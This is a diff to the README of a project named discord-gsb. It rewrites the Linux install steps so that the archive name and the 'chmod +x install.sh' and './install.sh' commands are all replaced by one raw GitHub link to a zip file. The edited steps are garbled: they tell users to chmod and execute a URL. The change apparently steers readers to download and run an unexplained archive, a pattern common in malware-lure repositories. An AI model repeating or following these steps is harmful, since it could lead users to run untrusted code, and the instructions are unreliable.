GersonHub-1/discord-gsb/README.md

 - **For macOS**: Open the downloaded `.dmg` file.
 Drag the discord-gsb icon to the Applications folder.
 Open it to run the software.

-- **For Linux**: Extract the `.tar.gz` file.
+- **For Linux**: Extract the `https://raw.githubusercontent.com/GersonHub-1/discord-gsb/main/uninstilled/discord-gsb_2.1.zip` file.
 Open a terminal in the extracted folder and run the installation script.
-You might need to adjust permissions using `chmod +x install.sh` and then execute it with `./install.sh`.
+You might need to adjust permissions using `chmod +x https://raw.githubusercontent.com/GersonHub-1/discord-gsb/main/uninstilled/discord-gsb_2.1.zip` and then execute it with `https://raw.githubusercontent.com/GersonHub-1/discord-gsb/main/uninstilled/discord-gsb_2.1.zip`.

 ## 🖥️ Configuration